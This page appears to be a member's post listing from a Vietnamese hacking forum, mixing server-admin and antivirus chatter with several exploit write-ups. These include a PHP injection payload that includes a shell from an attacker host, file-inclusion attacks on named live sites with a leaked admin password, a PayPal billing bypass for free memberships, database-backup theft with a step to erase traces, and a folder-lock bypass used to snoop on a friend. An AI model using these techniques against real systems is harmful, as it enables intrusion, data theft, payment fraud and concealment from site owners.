banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Messages posted by: hack2prison  XML
Profile for hack2prison Messages posted by hack2prison [ number of posts not being displayed on this page: 0 ]
 

ComandC wrote:
Hiện tại mình có dùng 1 máy ảo là centOS nhưng ở bản Minimal. Cho mình hỏi làm sao mà upload file lên server này được ạ? 


bật dịch vụ sshd
chạy cái này: Bitvise SSH Client
http://www.bitvise.com/download-area

thanh_1313 wrote:
Cho mình hỏi có cách nào tạo một hosting Linux (ubuntu hay centos...) có thể chạy được tất tần tật các source web php, asp... Mình có cài qua zpanel, cpanel, kloxo, ... nhưng chúng không có chạy được mấy loại web hay chạy trên windows. Mình đang muốn tiết kiệm chi phí, bỏ hết tất cả lên 1 con linux thui. Các bác có gợi ý nào cho mình không? smilie 


Được nhé bạn:
http://www.mono-project.com/Main_Page

Ikut3 wrote:
Trước khi sizing 1 cái gì từ thiết bị phần cứng, cho đến các tunning chỉnh sửa thì những thông tin như thế này bắt buộc phải có

- Tổng lượng User connect / tính trung bình
- Lượng Concurrent Request thật đến dịch vụ tại mọi thời điểm
- Số lượng User mà bạn nhắm sẽ đáp ứng cho thời điểm hiện tại và tương lai

Trong các thông số mà bạn đưa ở trên kia thì không có cái thông tin gì về lượng người bạn sẽ đáp ứng với cấu hình phần cứng hiện tại cả.

Theo mình, trước khi tunning hay quyết định gia tăng tài nguyên hệ thống nhằm mở rộng tính scalability 1 dịch vụ / 1 ứng dụng phục vụ người dùng. Mình phải thấy được rõ những thông số thật mà hệ thống hiện tại đang phải chịu tải, kiểm tra từ các thành phần Application - Operating System - Network - Hardware xem có bị bottleneck ở đâu không rồi mới bắt đầu tiến hành nâng cấp.


Tất nhiên để làm được cái đoạn in nghiêng trên thì chỉ có 1 cách giúp bạn đó là theo dõi. Những công cụ monitor như Dtracetool , Sysstat (có sẵn) v.v... đều có thể làm rất tốt việc này.  


Thanks
Tổng số visitors tại cùng thời điểm trung bình khoảng 150 người, mỗi visitor mở khoảng 5 tab đồng thời (theo thống kê của google analytics). Số lượng visitors ổn đình, ít tăng giảm đột biến. Mình chỉ tính cho hiện tại, còn sau này nếu có tăng thì nâng cấp sau.
Chào các bạn
Mình có 2 Severs:

Server 1: Cài Apache + PHP dùng để chứa web code
CPU: 2 Cores x Intel(R) Xeon(R) CPU E5640@2.67GHz
RAM: 2 GB - DDR3 ECC RAM

Server 2: Cài MySQL để chứa database
CPU: CPU XEON E5/E3 / Opteron 6200/6300 (dual core)
RAM: 2 GB

Sở dĩ mình tách ra 2 Servers vì sites của mình là warez sites, dễ bị suspended. Nếu bị report và suspend thì chỉ server chứa code bị suspend, server database vẫn OK.


Server 1 và Server 2 khác network nhưng gần nhau về địa lý (cùng 1 quốc gia)

Mình nhờ các bạn tính toán giùm mình tài nguyên phần cứng để đảm bảo site hoạt động tốt đồng thời không lãng phí tiền bạc cho tài nguyên phần cứng.

Đây là task của Server 1 (chứa web code):
free -m
Code:
total used free shared buffers cached
Mem: 2001 247 1754 0 29 84
-/+ buffers/cache: 133 1867
Swap: 666 0 666

top



Đây là task của Server 2 (chứa MySQL database)
free -m
Code:
total used free shared buffers cached
Mem: 2010 1399 610 0 10 1248
-/+ buffers/cache: 141 1869
Swap: 2099 0 2099


top



Nhờ các bạn tư vấn tăng/giảm RAM và CPU của mỗi Server: ISP họ bán RAM theo block là 512 MB, CPU theo block là core.

Cảm ơn
Mô tả:
- Script: PHCDownload là mã nguồn ứng dụng web dùng để quản lý upload/download rất hay nhưng điểm yếu muôn thuở của các code cho phép upload là tạo điều kiện cho attacker cài ám khí lên server.
- Vendor: http://phpcredo.com
- Menthod: Remote File Inclusion.
- Infect: search, addfile và add comment function.
- Version: v1.1.0 and older
- Reported: H2P
Khai thác:
- Google dork: Powered by PHCDownload 1.1.0
- http://[insecure_site]/[path]/search.php
Search Words: ">< <?php include("[http://attacker_site]/[shell_file]"); ?>
Submit và xem điều kỳ diệu.

Note: Tương tự đối với chức năng add file và post comment
Bạn có thể chạy mã PHP: http://[insecure_site]/[path]/search.php?string=">< <?php PHP_CODE_HERE ?>
Cái này hơi lạ, giống Remote File Inclusion nhưng còn có thể chèn và chạy trực tiếp mã PHP.
Với người kinh nghiệm thì việc đó hơn giản nhưng với người chưa có kinh nghiệm tợ khuyên cậu cách tốt nhất để giải quyết. Làm đúng theo các bước sau:
1. Rút USB ra nếu đang cắm.
2. Dùng Hiren boot và Ghost lại máy.
3. Khởi động Windows. Tuyệt đối không chạy bất cứ chương trình nào đặc biệt là mở các ổ đĩa (cái này rất quan trọng, nếu không virus sẽ lây trở lại).
4. Download cài này: http://warezshare.com/anti-virusspy/516-usb-drive-antivirus.html Lưu file ngoài desktop nhé. Cài đặt nó.
5. Bật chương trình. Scan targets chọn tất cả. Nhấn nút Scan.
6. Nhấn vào FixSystem, chọn các mục thích hợp hoặc chọn hết (Check all), nhấn Apply.
Xong rồi đó. Tuy nhiên chương trình diệt virus này không hiệu quả, nó chỉ dùng như một Tool nhỏ. Bạn nên cài một chương trình antivirus khác (tớ thích Avast, nhẹ mà hiệu quả )để quét lại hệ thống, chắc là sẽ lượm được vài em.
Thân
Mình không dùng BKAV nhưng đọc cái này ở trang nào đó thấy có lý, leech qua đây để anh em bàn luận.

Tôi mới download BKAV bản mới nhất (16-1-2009)
Và nhờ http://www.virustotal.com check thử.

Nói thêm tí: virustotal.com sử dụng 38 phần mềm diệt virus hàng đầu thế giới BKAV không nằm trong 38 mới đauscau: http://www.virustotal.com/sobre.html Điên thế nhỉ, một phần mềm diệt virus hay thế mà không sử dụng

Kết quả: http://www.virustotal.com/analisis/5778ad760a1472ed1be610e299f845a9

a-squared 4.0.0.73 2009.01.16 PHISH.FraudTool.BachKhoa.A!IK
eSafe 7.0.17.0 2009.01.15 Suspicious File
Ikarus T3.1.1.45.0 2009.01.16 PHISH.FraudTool.BachKhoa.A
McAfee 5496 2009.01.15 New malware.jm
McAfee+Artemis 5496 2009.01.15 New malware.jm
SecureWeb-Gateway 6.7.6 2009.01.16 Win32.Malware.gen!84 (suspicious)
Sunbelt 3.2.1835.2 2009.01.16 VIPRE.Suspicious

Có thể là do nhận diện nhầm, nhưng chả hiểu sao càng coi cái kết quả test này lại càng thấy đúng.
FraudTool : Cái này chính xác!. Bán giá đắt, cam kết nhiều nhưng chẳng đáp ứng được bao nhiêu mà kiện nó cũng không được -->Fraud
Malware , Suspicious File : Cũng thấy đúng, thu thập thông tin của người sử dụng, nếu không sao anh ấy biết có bao nhiêu người đang sử dụng anh ấy.

Ikarus, a-squared chỉ đích danh PHISH.FraudTool.BachKhoa.A và tớ tin vào kết luận đó. Chắc 2 anh này đã mổ xẻ rất kỹ nên chỉ đích danh như vậy.
Sắp tới chắc anh Q sẽ liệt tất cả 38 chương trình diệt virus trên vào danh sách phần mềm diệt WINDOWS )

Còn ý kiến của bạn thế nào? 

tuangiang08 wrote:
Tôi có dùng Bkav và thấy Bkav có tool rất hay bạn có thể down ở đây:
http://bkav.com.vn/home/download/bkavhometool.exe bạn lưu trên máy tính của bạn sau đó chạy file này lên bấm vào Ghi log... sau đó chọn đường dẫn lưu lại trên máy tính của bạn file có tên là Kiemtra2009.bkc, bạn hãy gửi file này về cho tôi qua email tuangiang08@gmail.com tôi sẽ kiểm tra và xử lý cho bạn. Chúc bạn thành công. smilie  


Này thì BKAV: http://www.virustotal.com/analisis/5778ad760a1472ed1be610e299f845a9
Chương trình này đặc trị virus lây qua USB.
Với nó, hãy quên virus lây qua USB đi nhé:
http://warezshare.com/anti-virusspy/516-usb-drive-antivirus.html
Chương trình này đặc trị virus lây qua USB.
Với nó, hãy quên virus lây qua USB đi nhé:
http://warezshare.com/anti-virusspy/516-usb-drive-antivirus.html
Post nhầm chỗ rồi, sorry
Folder Lock cũng có điểm yếu của nó, có thể bị soi mói đấy. Nếu bạn muốn giấu thì zip đặt mật khẩu ngon ngon chút hoặc lại renname thành đuôi khác. VD: secret.sys rồi copy vào một thư mục nào đó "sâu sâu" chút như: C:\WINDOWS\Help\Tours\htmlTour
Khi cần dùng thì rename lại thành secret.zip để sử dụng. Dùng xong update thông tin rồi lại cất giấu như cũ.
Chú ý: Lưu một bản copy vào hòm thư để lỡ quên format C:\ hay quên pass file zip thì có hàng chống cháy

Hì hì Nhưng câu ở trên là không tìm thấy File đó thì lấy đâu ra để mà mở nó bằng Notepad hả anh Zai 


You cài folder access 2 chưa à? Cài xong và lock một folder thì mới có file đó smilie
Mình tìm script làm trang download và phát hiện ra lỗi Local File Inclusion của Jeebles Directory.
vào http://google.com gõ từ khóa: Powered by Jeebles Directory
Kết quả cũng kha khá nhỉ smilie ta lấy thằng thứ 2 thử nhé: http://www.esco.net/highres

Công thức khai thác: http://[site]/[path]/download.php?settings2.inc.php
Như vậy với ví dụ trên sẽ là: http://www.esco.net/highres/download.php?settings2.inc.php
Một file đẹp đẹp mời ta download. Mở ra thấy:
Code:
...
$LOGIN_INFORMATION = array(
'admin' => '3quipm3nt01'
...

Bạn có thể download các file khác, muốn rõ thông tin download script này về nghiên cứu he
COMPLETED - Discovered by H2P
Không phải chạy Start-->Run đâu. Dùng Notepad mở file đó. Test bản mới nhất trên site của nó
BKAV à? smilie hài lắm
CHo USB vào nó quét một thôi một hồi, thậm chí đã rút USB ra rồi nó vẫn miệt mài quét. Có trường hợp quét xong báo: Đã phát hiện Virus ABC F:\ABC.com mặc dù cái máy tính đó "không có chữ F nào cả". smilie
Nhớ ngày trước lúc dịch virus lây qua Yahoo, mình có lấy mã nguồn về biên dịch thử. Nếu thay đổi http://nhut.be bằng bất kỳ domain nào khác và quét file đó thì BKAV không cảnh báo virus gì cả ===>BKAV không "phát hiện" virus theo hành vi mà "phát hiện" theo chuỗi ký tự như một cái máy không hơn.
Đã giải quyết xong. Hình như đây cũng là một vấn đề bảo mật của chương trình. Có thể coi là một bug:
Xem: /hvaonline/posts/list/0/15337.html
Cậu bạn nào đó đã post bài cầu cứu lấy lại dữ liệu của cậu ta bảo vệ bằng Folder Access nhưng lỡ quên password /hvaonline/posts/list/7134.html, tôi nghĩ nhiều người cũng bị tình trạng này nên mở topic mới để sau dễ sử dụng. Dĩ nhiên bạn cũng có thể dùng để đánh cắp dữ liệu, nhưng hậu quả xin đừng đổ cho tôi smilie . Nếu thấy "hay" thì mod PIN lên cái nhé.
Tớ đã test thành công với bản FREE:
Muốn bắt cọp phải vào hang cọp, download về cái đã http://www.folderaccess.com Cài đặt nó để thử nghiệm.
Tạo một folder ‘test’ trong D và copy một file text bất kỳ vào đó để thử nghiệm nhé (Vì sao phải copy một file vào đó? vì nếu folder empty sau này làm sao bạn kiểm tra được sự toàn vẹn thông tin). Ngay khi lock folder ‘test’, bạn có thể copy/delete/rename nó. Khởi động lại và thử double click vào nó, chuyện gì xảy ra? Right click chọn Open hay Explorer bạn sẽ được chuyển vào Control Panel. Thử double click vào xem, nó đòi password.
Giả sử rằng ta ngồi nhờ máy và bị chủ nhân nó lock folder ‘test’ trước đó hoặc ta là chủ nhân nhưng quên mìa nó password.
Bây giờ ta thử copy/delete/rename thử coi, nó sẽ báo lỗi:
Code:
Cannot delete test.{21EC2020-3AEA-1069-A2DD-08002B30309D}: It is being used by another person or program.
Close any program that might be using the file and try again.

Mở nó ra thì nó đòi password. Không lẽ bó tay?
Có rất nhiều bạn đưa ra phương án khác nhau nhưng phần ý kiến là copy sang máy khác, kill process (hình như không được), nhưng như đã nói ở trên, làm sao copy được trong windows đây? hay là copy trong DOS?
Tôi đã đọc tất cả các ý kiến được thảo luận trong topic của bạn đó nhưng có vẻ không thể thực hiện (tôi chưa thử).

Cách 1. Vào NC DOS bằng Hiren Boot chẳng nhìn thấy folder 'test' đâu cả. Chỉ thấy file ‘test~1. {21’. Khè khè trong windows nhìn thấy thư mục ‘test’ chuyển thành biểu tượng của chương trình Folder Access nhưng thực chất nó là một file, nhớ lại khi delete/copy/rename nó báo cannot delete/copy/rename test.{21EC2020-3AEA-1069-A2DD-08002B30309D} vào DOS nó tự đổi tên theo quy tắc 8.3. Rename nó thành ‘test’ và khởi động lại Windows nào. Kiểm tra lại sự toàn vẹn thông tin mà tôi nói ở trên nhé. smilie Nếu bạn không có Hiren Boot hoặc không biết sử dụng thì dùng cách 2.

Cách 2. Copy ngay trong windows với một thủ thuật nhỏ.
Mở file C:\WINDOWS\system32\mslck.dat thấy nội dung: 'Test D:\ 1' bạn sửa số 1 thành 0. Save và khởi động lại. Bây giờ bạn thử copy vào USB nào. Ngạc nhiên chưa? Tuy nhiên folder gốc và folder vừa copy vào USB vẫn chưa thể mở được. Nó vẫn đòi pass một cách đáng ghét. Đưa sang máy khác, vẫn chưa đọc được đâu. Bạn phải cài Folder Access vào. Đừng vội set password cho chương trình nhé. Click thử vào folder 'test' vừa copy trong USB coi. Nó đã được unlock.

Với bản Purchase cũng tương tự, bạn có thể dùng serial lúc cài đặt chương trình như là một password "chống cháy". Tớ nghĩ có thể dùng ngay Windows Comander để rename file đó nhưng chưa test. Bản chất vấn đề đã được giải quyết, xin vui lòng test thử các cách khác có khi đơn giản hơn.
H2P
+ default password (hack2prison): lQ nghĩ là nếu ctr FA2 này đơn giản (ở chỗ nó có thể vô hiệu hoá dễ dàng) thì nó sẽ ko có default pasword. Nhưng đây cũng là 1 cách có thể áp dụng được với các ctr khác.  

Default password chính là cái serial number lúc bạn cài. Xem file serial trong thư mục cài đặt nhé. Tớ đã thực hiện thành công với vài chương trình lock folder. Không biết chương trình bạn dùng có áp dụng cách này được không

lQ wrote:

H3in3k3n wrote:
Format hết rồi dùng Soft khôi phục dữ liệu chứ sao .Hixx đúng là bảo mật quá hóa hại . 

Mẹ ôi, mới nghe cách này lần đầu luôn. smilie  


Không rõ chỗ này, nhưng với GetDataBack có thể làm được việc này đó bạn. Mình format 2 lần vẫn lấy lại được trừ các file dung lượng lớn (phim và file .GHO)
Các chương trình bảo vệ folder thường có một default password để khi lỡ quên pass có thể giải nguy. Tôi đã dùng mấy chương trình và thấy chúng hoạt động như vậy. Default password chính là số serial khi bạn cài đặt (Mở thư mục file setup coi thử file serial.txt). Try it.
Nhớ lúc trước thằng ku bạn nó bảo vệ thư mục phim sex nó đóng với con bồ nó, mình vào xem bằng cách này phê smilie
Cái này không phải là bug mà là sơ xuất của admin, lẽ ra phải delete thì lại không delete.
Security bug là một lỗi có thể nguy hiểm đến ứng dụng/hệ thống mà khi thiết kế coder không lường trước được
Với cái bigdump thì ý đồ của coder này là dùng để upload file lên server và restore nó và nó thực hiện đúng ý đồ này, không phát sinh sự nguy hiểm nào. Lỗi là do sự sơ xuất hoặc thiếu hiểu biết của người sử dụng.
Việc chạy được file .php.sql là do lỗi server không liên quan gì đến bigdump. smilie
Nguồn: http://www.securityfocus.com/archive/1/474936

1. Click "Business Owners" và đăng ký một account.
2. Login sẽ thấy:
-------------------------------------------------
Membership Expiration: 00-00-0000
Maximum Coupons: 0 Coupons Used: 0 Coupons Available: 0
-------------------------------------------------
Nghĩa là bạn chưa phải là thành viên đóng phí (Premium Member).
3. Click "Billing Control Panel"
Click "Buy now" sẽ wwwect tới paypal.com checkout
OK, copy link http://site.com/path/user.php/user.php?REQ=auth&billing=141&status=success&custom=upgradeX và paste đè lên link paypal.
Chú ý: =upgradeX ---> X là số promotion bạn cần. Example: http://site.com/path/user.php/user.php?REQ=auth&billing=141&status=success&custom=upgrade5
OK Login lại bạn sẽ thấy:
-------------------------------------------------
Membership Expiration: 07-28-2007
Maximum Coupons: 0 Coupons Used: 0 Coupons Available: 0

Lặp lại động tác trên lần nữa Expiration sẽ tăng thêm 1 tháng, làm cái nữa sẽ tăng lên 2 tháng...

Khè khè, dùng không mất tiền.
Bổ sung:
- Added by leo9x:
http://[site]/[path]/admin/backupstart.php
Upload len shell file dạng .php.sql sẽ run được trên nhiều server: http://[site]/[path]/admin/dump/file.php.sql
- Added by navaro:
http://[site]/[path]/admin/downloadbackup.php?fl=[filename] -->Local File Inclusion
Nguồn: http://www.securityfocus.com/archive/1/481206

Lâu rồi, chăm sóc vợ sắp đẻ nên H2P không tham gia forum. Hôm nay ngồi ngứa nghề tìm ra cái bug stupid nhưng khá nguy hiểm.
Cũng chẳng có gì cao siêu nên H2P mới gọi là stupid bug, nhưng vấn đề là khai thác toàn diện. Lòng vòng nhiều quá, ta vào cuộc:
google keyword: allinurl: "index.php?Act=Merchants" Kết quả kha khá nhỉ? Thử thay trang tìm kiếm khác và vài từ khóa khác tự nghĩ ra nhé, hỏi là tớ chửi cho đấy.
Thử thằng đầu tiên nhé: http://www.eduaffiliates.com/index.php?Act=Merchants

1. http://www.eduaffiliates.com/admin/dump
sẽ thấy backup-23-08-2007.sql cái gì đây, lol file backup của nó đấy.
Trong trường hợp thư mục được bảo vệ bằng 1 file index, .htaccess, nó chưa backup hoặc file backup đã quá cũ (ngày tháng năm backup nằm trong tên file ấy) mà mình muốn lấy file backup mới nhất thì sao.

2. Tạo file backup
- http://www.eduaffiliates.com/admin/backupstart.php
click vào nút Backup
a. Quay lại: http://www.eduaffiliates.com/admin/dump
sẽ thấy file backup-14-09-2007.sql là file ta vừa tạo ra (ngày 14-09-2007) get it.
b. Trong trường hợp thư mục được bảo vệ bằng 1 file index, bạn không thấy được thì làm sao download. Đơn giản: http://www.eduaffiliates.com/admin/dump/backup-dd-mm-yyyy.sql
thay ngày tháng năm theo giờ sever nhé.
c. Trong trường hợp thư mục được bảo vệ bằng 1 file .htaccess bạn sẽ nhận lỗi Forbiden, cũng đơn giản thôi http://www.eduaffiliates.com/admin/downloadbackup.php?fl=backup-dd-mm-yyyy.sql

3. Xóa dấu vết
Đây là bước quan trọng để admin không biết bị đột nhập: http://www.eduaffiliates.com/admin/deletebackup.php?fl=backup-dd-mm-yyyy.sql

Ghi chú: Trang eduaffiliates.com đã die, tìm trang khác để thực hành. Một vài trang đã fix, Còn khá nhiều trang dính đấy.
COMPLETED - H2P
Uh, giá trị bằng 0 thì đâu có tác dụng gì, 3 dòng thừa. Chú này biên dịch lại mà chẳng hiểu tác dụng của nó là gì Script Kid Dies smilie
Tranh thủ quảng cáo cái: http://sockstoday.com sock ngon nhà em đấy :lolsmilie
1. Nếu cái gì đó có một "CHUẨN" nghĩa là gần như mang tính tuyệt đối <> Trên đời này chẳng có gì là tuyệt đối.
2. Có thể tồn tại một chuẩn mà bạn đang tìm nhưng đọc lại 1
Khởi động từ DOS copy qua chỗ khác mà coi smilie
Nghe có vẻ tìm bug mới dễ nhỉ. Khâm phục smilie)
 
Go to Page:  Page 2 Last Page

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|